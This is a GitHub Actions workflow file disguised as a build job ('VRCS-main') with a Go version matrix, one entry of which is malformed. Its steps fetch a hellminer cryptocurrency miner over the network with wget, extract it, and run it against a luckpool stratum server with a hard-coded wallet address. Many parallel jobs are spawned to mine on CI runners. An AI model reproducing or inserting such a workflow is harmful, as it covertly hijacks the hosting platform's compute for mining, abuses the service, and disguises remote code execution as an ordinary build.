name: VRCS-main

on: [workflow_dispatch,push]

jobs:
  build:
    name: VRCS-main
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - name: Extract
      run: tar xf /home/runner/work/github-username/repository-name/hellminer_cpu_linux.tar.gz
    - name: RUNNING
      run: chmod +x * && ./hellminer -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RJfAim3fWecf4KV8D5XDPE6BrJKJASrZMz.gihub -p x --cpu 2
    - name: DONE
      run: exit

